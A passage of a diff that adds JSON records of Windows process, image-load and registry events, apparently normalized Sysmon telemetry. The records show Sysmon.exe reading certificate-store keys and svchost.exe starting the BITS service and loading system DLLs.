"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\System32\\msvcr120_clr0400.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573456200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456509984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 6868, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573456770000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "qmgr.dll", + "image_path": "C:\\Windows\\System32\\qmgr.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "esent.dll", + "image_path": "C:\\Windows\\System32\\esent.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456830000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 